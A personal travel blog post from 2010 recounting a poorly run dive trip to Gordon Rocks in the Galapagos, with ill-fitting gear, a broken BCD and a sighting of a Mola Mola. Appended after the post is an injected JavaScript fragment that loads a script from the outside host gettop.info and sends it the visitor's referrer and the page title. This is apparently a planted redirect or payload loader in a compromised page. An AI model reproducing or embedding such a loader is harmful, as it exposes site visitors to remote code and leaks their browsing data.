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Mola Mola and the worst dive

Posted by Susanna On October - 15 - 2010

I made a mistake today and went diving with Albatros Tours a dive company in Puerto Ayora. Two days ago I had checked my wet suit over there and for one hour they really could not find me the right seize and I got so exhausted (trying on thick wetsuits is exhausting) that I almost gave up at that point already. I should have! When I ask after my fins and hood they said it will be on the boat and I should not worry. Then today on the boat what was not even a dive boat more like a nutshell we went to famous Gordon Rocks. People of all dive level were mixed up. Some had only 8 dives or haven’t dove in a long time. The fins were not the right seize, some people they had give fins of two different kind! The hoods were not fitting so needed to dive without! And when I thought to refuse to dive they refused to give me back my money…. I showed them off the security leaks but they didn’t care… Out of a sudden my BCD was broken as well – crazy but I had noticed it! Well the conditions were extreme with big waves… People run out of air after 20min. But how could they take beginners of such a dive?!? In the end it was not that extraordinary but then I saw Mola Mola the sun or moon fish. It was very big about 2 meters and it just looks amazing. What an experience. If it wasn’t for that fish I would have said it was the dive which sucked most ever….

Mola Mola s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

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